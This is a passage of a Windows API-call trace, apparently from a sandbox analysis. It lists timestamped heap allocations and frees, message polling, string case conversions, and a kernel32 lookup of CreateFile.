hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0197.037] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0197.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.039] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.039] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0197.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0197.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0197.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0197.040] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0197.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0197.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.043] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.046] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8e8 [0197.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0197.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.047] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.047] 